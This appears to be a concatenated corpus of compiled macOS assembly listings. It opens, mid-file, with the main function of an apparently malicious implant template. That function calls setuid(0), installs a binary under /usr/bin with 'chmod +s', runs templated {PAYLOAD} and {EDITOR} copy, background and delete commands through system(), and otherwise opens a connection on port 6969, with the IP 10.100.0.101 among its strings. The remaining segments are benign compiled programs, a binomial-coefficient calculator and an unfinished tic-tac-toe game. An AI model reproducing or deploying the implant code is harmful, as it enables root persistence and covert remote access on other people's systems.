movl $1, -196(%rbp)
LBB5_3:
movl -196(%rbp), %eax
movl %eax, -220(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB5_5
## %bb.4:
movl -220(%rbp), %eax ## 4-byte Reload
addq $224, %rsp
popq %rbp
retq
LBB5_5:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $336, %rsp ## imm = 0x150
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -308(%rbp)
movl %edi, -312(%rbp)
movq %rsi, -320(%rbp)
xorl %edi, %edi
callq _setuid
movq -320(%rbp), %rax
movq (%rax), %rdi
callq _install
cmpl $1, %eax
jne LBB6_2
## %bb.1:
movl $0, -308(%rbp)
jmp LBB6_13
LBB6_2:
leaq -112(%rbp), %rdi
leaq l___const.main.args(%rip), %rsi
movl $100, %edx
callq _memcpy
leaq -112(%rbp), %rdi
leaq L_.str.11(%rip), %rsi
movl $100, %edx
callq ___strcat_chk
movl $1, -324(%rbp)
LBB6_3: ## =>This Inner Loop Header: Depth=1
movl -324(%rbp), %eax
cmpl -312(%rbp), %eax
jge LBB6_8
## %bb.4: ## in Loop: Header=BB6_3 Depth=1
leaq -112(%rbp), %rdi
movq -320(%rbp), %rax
movslq -324(%rbp), %rcx
movq (%rax,%rcx,8), %rsi
movl $100, %edx
callq ___strcat_chk
movl -324(%rbp), %eax
movl -312(%rbp), %ecx
subl $1, %ecx
cmpl %ecx, %eax
je LBB6_6
## %bb.5: ## in Loop: Header=BB6_3 Depth=1
leaq -112(%rbp), %rdi
leaq L_.str.11(%rip), %rsi
movl $100, %edx
callq ___strcat_chk
LBB6_6: ## in Loop: Header=BB6_3 Depth=1
jmp LBB6_7
LBB6_7: ## in Loop: Header=BB6_3 Depth=1
movl -324(%rbp), %eax
addl $1, %eax
movl %eax, -324(%rbp)
jmp LBB6_3
LBB6_8:
leaq L_.str.12(%rip), %rdi
xorl %esi, %esi
callq _access
cmpl $0, %eax
je LBB6_10
## %bb.9:
leaq -176(%rbp), %rdi
xorl %esi, %esi
movl $50, %edx
callq _memset
movb $99, -176(%rbp)
movb $112, -175(%rbp)
movb $32, -174(%rbp)
leaq -240(%rbp), %rdi
leaq l___const.main.cmd2(%rip), %rsi
movl $50, %edx
callq _memcpy
leaq -304(%rbp), %rdi
xorl %esi, %esi
movl $50, %edx
callq _memset
movb $114, -304(%rbp)
movb $109, -303(%rbp)
movb $32, -302(%rbp)
movb $45, -301(%rbp)
movb $102, -300(%rbp)
movb $32, -299(%rbp)
leaq -176(%rbp), %rdi
leaq L_.str.9(%rip), %rsi
movl $50, %edx
callq ___strcat_chk
leaq -176(%rbp), %rdi
leaq L_.str.11(%rip), %rsi
movl $50, %edx
callq ___strcat_chk
leaq -176(%rbp), %rdi
leaq L_.str.12(%rip), %rsi
movl $50, %edx
callq ___strcat_chk
leaq -240(%rbp), %rdi
leaq L_.str.13(%rip), %rsi
movl $50, %edx
callq ___strcat_chk
leaq -304(%rbp), %rdi
leaq L_.str.12(%rip), %rsi
movl $50, %edx
callq ___strcat_chk
leaq -176(%rbp), %rdi
callq _system
leaq -240(%rbp), %rdi
callq _system
xorl %edi, %edi
callq _sleep
leaq -304(%rbp), %rdi
callq _system
leaq -112(%rbp), %rdi
callq _system
jmp LBB6_13
LBB6_10:
callq _testpid
cmpl $0, %eax
jne LBB6_12
## %bb.11:
movl $6969, %edi ## imm = 0x1B39
xorl %esi, %esi
callq _establishConnection
movl %eax, -308(%rbp)
jmp LBB6_13
LBB6_12:
jmp LBB6_13
LBB6_13:
movl -308(%rbp), %eax
movl %eax, -328(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB6_15
## %bb.14:
movl -328(%rbp), %eax ## 4-byte Reload
addq $336, %rsp ## imm = 0x150
popq %rbp
retq
LBB6_15:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "{STATUS}"
L_.str.1: ## @.str.1
.asciz "w"
L_.str.2: ## @.str.2
.asciz "%d"
L_.str.3: ## @.str.3
.asciz "r"
L_.str.4: ## @.str.4
.asciz "10.100.0.101"
L_.str.5: ## @.str.5
.asciz "\n"
L_.str.6: ## @.str.6
.asciz " 2>"
L_.str.7: ## @.str.7
.asciz "{ERROR}"
.section __TEXT,__const
.p2align 4 ## @__const.install.path
l___const.install.path:
.asciz "/usr/bin/\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
L_.str.8: ## @.str.8
.asciz "{BINARYNAME}"
.section __TEXT,__const
.p2align 4 ## @__const.install.newpath
l___const.install.newpath:
.asciz "/usr/bin/\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
L_.str.9: ## @.str.9
.asciz "{EDITOR}"
.section __TEXT,__const
.p2align 4 ## @__const.install.cmd
l___const.install.cmd:
.asciz "chmod +s \000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
L_.str.10: ## @.str.10
.asciz "Installed\n"
.section __TEXT,__const
.p2align 4 ## @__const.main.args
l___const.main.args:
.asciz "{BINARYNAME}\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
L_.str.11: ## @.str.11
.asciz " "
L_.str.12: ## @.str.12
.asciz "{PAYLOAD}"
.section __TEXT,__const
.p2align 4 ## @__const.main.cmd2
l___const.main.cmd2:
.asciz "{PAYLOAD}\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
L_.str.13: ## @.str.13
.asciz " &"
.subsections_via_symbols
| the_stack_data/167331522.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov x8, #1
str x8, [sp, #48]
str x8, [sp, #40]
str x8, [sp, #32]
mov x9, sp
sub x8, x29, #40
str x8, [x9]
sub x8, x29, #32
str x8, [x9, #8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldur x8, [x29, #-40]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
mov x8, sp
str xzr, [x8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_2
LBB0_2:
ldur x8, [x29, #-40]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_16
b LBB0_3
LBB0_3:
mov x8, #1
stur x8, [x29, #-16]
b LBB0_4
LBB0_4: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-16]
ldur x9, [x29, #-32]
subs x8, x8, x9
cset w8, gt
tbnz w8, #0, LBB0_7
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_4 Depth=1
ldr x8, [sp, #48]
ldur x9, [x29, #-16]
mul x8, x8, x9
str x8, [sp, #48]
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_4 Depth=1
ldur x8, [x29, #-16]
add x8, x8, #1
stur x8, [x29, #-16]
b LBB0_4
LBB0_7:
mov x8, #1
stur x8, [x29, #-24]
b LBB0_8
LBB0_8: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-24]
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, gt
tbnz w8, #0, LBB0_11
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_8 Depth=1
ldr x8, [sp, #40]
ldur x9, [x29, #-24]
mul x8, x8, x9
str x8, [sp, #40]
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_8 Depth=1
ldur x8, [x29, #-24]
add x8, x8, #1
stur x8, [x29, #-24]
b LBB0_8
LBB0_11:
mov x8, #1
str x8, [sp, #24]
b LBB0_12
LBB0_12: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #24]
ldur x9, [x29, #-40]
ldur x10, [x29, #-32]
subs x9, x9, x10
subs x8, x8, x9
cset w8, gt
tbnz w8, #0, LBB0_15
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_12 Depth=1
ldr x8, [sp, #32]
ldr x9, [sp, #24]
mul x8, x8, x9
str x8, [sp, #32]
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_12 Depth=1
ldr x8, [sp, #24]
add x8, x8, #1
str x8, [sp, #24]
b LBB0_12
LBB0_15:
ldr x8, [sp, #40]
ldr x9, [sp, #48]
ldr x10, [sp, #32]
mul x9, x9, x10
sdiv x8, x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_16
LBB0_16:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%lld%lld"
l_.str.1: ; @.str.1
.asciz "%lld"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movl $0, -4(%rbp)
movq $1, -48(%rbp)
movq $1, -56(%rbp)
movq $1, -64(%rbp)
leaq L_.str(%rip), %rdi
leaq -40(%rbp), %rsi
leaq -32(%rbp), %rdx
movb $0, %al
callq _scanf
cmpq $0, -40(%rbp)
jne LBB0_2
## %bb.1:
leaq L_.str.1(%rip), %rdi
xorl %esi, %esi
movb $0, %al
callq _printf
LBB0_2:
cmpq $0, -40(%rbp)
je LBB0_16
## %bb.3:
movq $1, -16(%rbp)
LBB0_4: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
cmpq -32(%rbp), %rax
jg LBB0_7
## %bb.5: ## in Loop: Header=BB0_4 Depth=1
movq -48(%rbp), %rax
imulq -16(%rbp), %rax
movq %rax, -48(%rbp)
## %bb.6: ## in Loop: Header=BB0_4 Depth=1
movq -16(%rbp), %rax
addq $1, %rax
movq %rax, -16(%rbp)
jmp LBB0_4
LBB0_7:
movq $1, -24(%rbp)
LBB0_8: ## =>This Inner Loop Header: Depth=1
movq -24(%rbp), %rax
cmpq -40(%rbp), %rax
jg LBB0_11
## %bb.9: ## in Loop: Header=BB0_8 Depth=1
movq -56(%rbp), %rax
imulq -24(%rbp), %rax
movq %rax, -56(%rbp)
## %bb.10: ## in Loop: Header=BB0_8 Depth=1
movq -24(%rbp), %rax
addq $1, %rax
movq %rax, -24(%rbp)
jmp LBB0_8
LBB0_11:
movq $1, -72(%rbp)
LBB0_12: ## =>This Inner Loop Header: Depth=1
movq -72(%rbp), %rax
movq -40(%rbp), %rcx
subq -32(%rbp), %rcx
cmpq %rcx, %rax
jg LBB0_15
## %bb.13: ## in Loop: Header=BB0_12 Depth=1
movq -64(%rbp), %rax
imulq -72(%rbp), %rax
movq %rax, -64(%rbp)
## %bb.14: ## in Loop: Header=BB0_12 Depth=1
movq -72(%rbp), %rax
addq $1, %rax
movq %rax, -72(%rbp)
jmp LBB0_12
LBB0_15:
movq -56(%rbp), %rax
movq -48(%rbp), %rcx
imulq -64(%rbp), %rcx
cqto
idivq %rcx
movq %rax, %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB0_16:
movl -4(%rbp), %eax
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%lld%lld"
L_.str.1: ## @.str.1
.asciz "%lld"
.subsections_via_symbols
| the_stack_data/153267543.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-28]
adrp x8, l___const.main.arr@PAGE
add x8, x8, l___const.main.arr@PAGEOFF
ldr x9, [x8]
sub x0, x29, #24
stur x9, [x29, #-24]
ldrb w8, [x8, #8]
sturb w8, [x29, #-16]
stur wzr, [x29, #-32]
mov w8, #1
stur w8, [x29, #-40]
bl _board
stur wzr, [x29, #-52]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_21 Depth 2
; Child Loop BB0_26 Depth 2
; Child Loop BB0_4 Depth 2
; Child Loop BB0_9 Depth 2
ldur w8, [x29, #-52]
subs w8, w8, #9
cset w8, ge
tbnz w8, #0, LBB0_39
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-40]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_20
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_4
LBB0_4: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #44
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_4 Depth=2
ldur w8, [x29, #-44]
subs w8, w8, #0
cset w8, lt
mov w9, #1
str w9, [sp, #56] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_4 Depth=2
ldur w8, [x29, #-44]
subs w8, w8, #3
cset w8, gt
str w8, [sp, #56] ; 4-byte Folded Spill
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_4 Depth=2
ldr w8, [sp, #56] ; 4-byte Folded Reload
tbnz w8, #0, LBB0_4
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_1 Depth=1
b LBB0_9
LBB0_9: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #48
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_9 Depth=2
ldur w8, [x29, #-48]
subs w8, w8, #0
cset w8, lt
mov w9, #1
str w9, [sp, #52] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_12
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_9 Depth=2
ldur w8, [x29, #-48]
subs w8, w8, #3
cset w8, gt
str w8, [sp, #52] ; 4-byte Folded Spill
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_9 Depth=2
ldr w8, [sp, #52] ; 4-byte Folded Reload
tbnz w8, #0, LBB0_9
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-44]
subs w8, w8, #1
sub x10, x29, #24
mov w9, #3
smaddl x8, w8, w9, x10
ldur w9, [x29, #-48]
subs w9, w9, #1
ldrsb w8, [x8, w9, sxtw]
subs w8, w8, #88
cset w8, eq
tbnz w8, #0, LBB0_15
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-44]
subs w8, w8, #1
sub x10, x29, #24
mov w9, #3
smaddl x8, w8, w9, x10
ldur w9, [x29, #-48]
subs w9, w9, #1
ldrsb w8, [x8, w9, sxtw]
subs w8, w8, #79
cset w8, ne
tbnz w8, #0, LBB0_16
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-52]
subs w8, w8, #1
stur w8, [x29, #-52]
ldur w8, [x29, #-44]
subs w11, w8, #1
ldur w8, [x29, #-48]
subs w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB0_17
LBB0_16: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-44]
subs w8, w8, #1
sub x10, x29, #24
mov w9, #3
smaddl x8, w8, w9, x10
ldur w9, [x29, #-48]
subs w9, w9, #1
add x9, x8, w9, sxtw
mov w8, #88
strb w8, [x9]
stur wzr, [x29, #-40]
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_1 Depth=1
sub x0, x29, #24
str x0, [sp, #40] ; 8-byte Folded Spill
bl _board
ldr x0, [sp, #40] ; 8-byte Folded Reload
bl _checkWin
subs w8, w0, #1
cset w8, ne
tbnz w8, #0, LBB0_19
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_1 Depth=1
mov w8, #1
stur w8, [x29, #-32]
mov w8, #10
stur w8, [x29, #-52]
b LBB0_19
LBB0_19: ; in Loop: Header=BB0_1 Depth=1
b LBB0_37
LBB0_20: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
b LBB0_21
LBB0_21: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #44
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
b LBB0_22
LBB0_22: ; in Loop: Header=BB0_21 Depth=2
ldur w8, [x29, #-44]
subs w8, w8, #0
cset w8, lt
mov w9, #1
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_24
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_21 Depth=2
ldur w8, [x29, #-44]
subs w8, w8, #3
cset w8, gt
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB0_24
LBB0_24: ; in Loop: Header=BB0_21 Depth=2
ldr w8, [sp, #36] ; 4-byte Folded Reload
tbnz w8, #0, LBB0_21
b LBB0_25
LBB0_25: ; in Loop: Header=BB0_1 Depth=1
b LBB0_26
LBB0_26: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #48
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
b LBB0_27
LBB0_27: ; in Loop: Header=BB0_26 Depth=2
ldur w8, [x29, #-48]
subs w8, w8, #0
cset w8, lt
mov w9, #1
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_29
b LBB0_28
LBB0_28: ; in Loop: Header=BB0_26 Depth=2
ldur w8, [x29, #-48]
subs w8, w8, #3
cset w8, gt
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB0_29
LBB0_29: ; in Loop: Header=BB0_26 Depth=2
ldr w8, [sp, #32] ; 4-byte Folded Reload
tbnz w8, #0, LBB0_26
b LBB0_30
LBB0_30: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-44]
subs w8, w8, #1
sub x10, x29, #24
mov w9, #3
smaddl x8, w8, w9, x10
ldur w9, [x29, #-48]
subs w9, w9, #1
ldrsb w8, [x8, w9, sxtw]
subs w8, w8, #88
cset w8, eq
tbnz w8, #0, LBB0_32
b LBB0_31
LBB0_31: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-44]
subs w8, w8, #1
sub x10, x29, #24
mov w9, #3
smaddl x8, w8, w9, x10
ldur w9, [x29, #-48]
subs w9, w9, #1
ldrsb w8, [x8, w9, sxtw]
subs w8, w8, #79
cset w8, ne
tbnz w8, #0, LBB0_33
b LBB0_32
LBB0_32: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-52]
subs w8, w8, #1
stur w8, [x29, #-52]
ldur w8, [x29, #-44]
subs w11, w8, #1
ldur w8, [x29, #-48]
subs w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB0_34
LBB0_33: ; in Loop: Header=BB0_1 Depth=1
ldur w9, [x29, #-44]
mov w8, #1
subs w9, w9, #1
sub x11, x29, #24
mov w10, #3
smaddl x9, w9, w10, x11
ldur w10, [x29, #-48]
subs w10, w10, #1
add x10, x9, w10, sxtw
mov w9, #79
strb w9, [x10]
stur w8, [x29, #-40]
b LBB0_34
LBB0_34: ; in Loop: Header=BB0_1 Depth=1
sub x0, x29, #24
str x0, [sp, #24] ; 8-byte Folded Spill
bl _board
ldr x0, [sp, #24] ; 8-byte Folded Reload
bl _checkWin
subs w8, w0, #1
cset w8, ne
tbnz w8, #0, LBB0_36
b LBB0_35
LBB0_35: ; in Loop: Header=BB0_1 Depth=1
mov w8, #2
stur w8, [x29, #-32]
mov w8, #10
stur w8, [x29, #-52]
b LBB0_36
LBB0_36: ; in Loop: Header=BB0_1 Depth=1
b LBB0_37
LBB0_37: ; in Loop: Header=BB0_1 Depth=1
b LBB0_38
LBB0_38: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-52]
add w8, w8, #1
stur w8, [x29, #-52]
b LBB0_1
LBB0_39:
ldur w8, [x29, #-52]
subs w8, w8, #9
cset w8, ne
tbnz w8, #0, LBB0_42
b LBB0_40
LBB0_40:
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_42
b LBB0_41
LBB0_41:
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
b LBB0_48
LBB0_42:
ldur w8, [x29, #-32]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_44
b LBB0_43
LBB0_43:
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _printf
b LBB0_47
LBB0_44:
ldur w8, [x29, #-32]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB0_46
b LBB0_45
LBB0_45:
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
b LBB0_46
LBB0_46:
b LBB0_47
LBB0_47:
b LBB0_48
LBB0_48:
ldur w8, [x29, #-28]
str w8, [sp, #20] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_50
b LBB0_49
LBB0_49:
bl ___stack_chk_fail
LBB0_50:
ldr w0, [sp, #20] ; 4-byte Folded Reload
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.globl _board ; -- Begin function board
.p2align 2
_board: ; @board
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
ldrsb w12, [x8]
ldur x8, [x29, #-8]
ldrsb w11, [x8, #1]
ldur x8, [x29, #-8]
ldrsb w10, [x8, #2]
mov x9, sp
; implicit-def: $x8
mov x8, x12
str x8, [x9]
; implicit-def: $x8
mov x8, x11
str x8, [x9, #8]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #16]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
stur x0, [x29, #-16] ; 8-byte Folded Spill
bl _printf
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
str x0, [sp, #24] ; 8-byte Folded Spill
bl _printf
ldur x0, [x29, #-16] ; 8-byte Folded Reload
ldur x8, [x29, #-8]
ldrsb w12, [x8, #3]
ldur x8, [x29, #-8]
ldrsb w11, [x8, #4]
ldur x8, [x29, #-8]
ldrsb w10, [x8, #5]
mov x9, sp
; implicit-def: $x8
mov x8, x12
str x8, [x9]
; implicit-def: $x8
mov x8, x11
str x8, [x9, #8]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #16]
bl _printf
ldr x0, [sp, #24] ; 8-byte Folded Reload
bl _printf
ldur x0, [x29, #-16] ; 8-byte Folded Reload
ldur x8, [x29, #-8]
ldrsb w12, [x8, #6]
ldur x8, [x29, #-8]
ldrsb w11, [x8, #7]
ldur x8, [x29, #-8]
ldrsb w10, [x8, #8]
mov x9, sp
; implicit-def: $x8
mov x8, x12
str x8, [x9]
; implicit-def: $x8
mov x8, x11
str x8, [x9, #8]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #16]
bl _printf
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _checkWin ; -- Begin function checkWin
.p2align 2
_checkWin: ; @checkWin
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp]
ldr x8, [sp]
ldrsb w8, [x8]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_3
b LBB2_1
LBB2_1:
ldr x8, [sp]
ldrsb w8, [x8, #1]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_3
b LBB2_2
LBB2_2:
ldr x8, [sp]
ldrsb w8, [x8, #2]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB2_6
b LBB2_3
LBB2_3:
ldr x8, [sp]
ldrsb w8, [x8]
ldr x9, [sp]
ldrsb w9, [x9, #1]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_6
b LBB2_4
LBB2_4:
ldr x8, [sp]
ldrsb w8, [x8, #1]
ldr x9, [sp]
ldrsb w9, [x9, #2]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_6
b LBB2_5
LBB2_5:
mov w8, #1
str w8, [sp, #12]
b LBB2_49
LBB2_6:
ldr x8, [sp]
ldrsb w8, [x8, #3]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_9
b LBB2_7
LBB2_7:
ldr x8, [sp]
ldrsb w8, [x8, #4]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_9
b LBB2_8
LBB2_8:
ldr x8, [sp]
ldrsb w8, [x8, #5]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB2_12
b LBB2_9
LBB2_9:
ldr x8, [sp]
ldrsb w8, [x8, #3]
ldr x9, [sp]
ldrsb w9, [x9, #4]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_12
b LBB2_10
LBB2_10:
ldr x8, [sp]
ldrsb w8, [x8, #4]
ldr x9, [sp]
ldrsb w9, [x9, #5]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_12
b LBB2_11
LBB2_11:
mov w8, #1
str w8, [sp, #12]
b LBB2_49
LBB2_12:
ldr x8, [sp]
ldrsb w8, [x8, #6]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_15
b LBB2_13
LBB2_13:
ldr x8, [sp]
ldrsb w8, [x8, #7]
subs w8, w8, #32
cset w8, ne
tbnz w8, #0, LBB2_15
b LBB2_14
LBB2_14:
ldr x8, [sp]
ldrsb w8, [x8, #8]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB2_18
b LBB2_15
LBB2_15:
ldr x8, [sp]
ldrsb w8, [x8, #6]
ldr x9, [sp]
ldrsb w9, [x9, #7]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_18
b LBB2_16
LBB2_16:
ldr x8, [sp]
ldrsb w8, [x8, #7]
ldr x9, [sp]
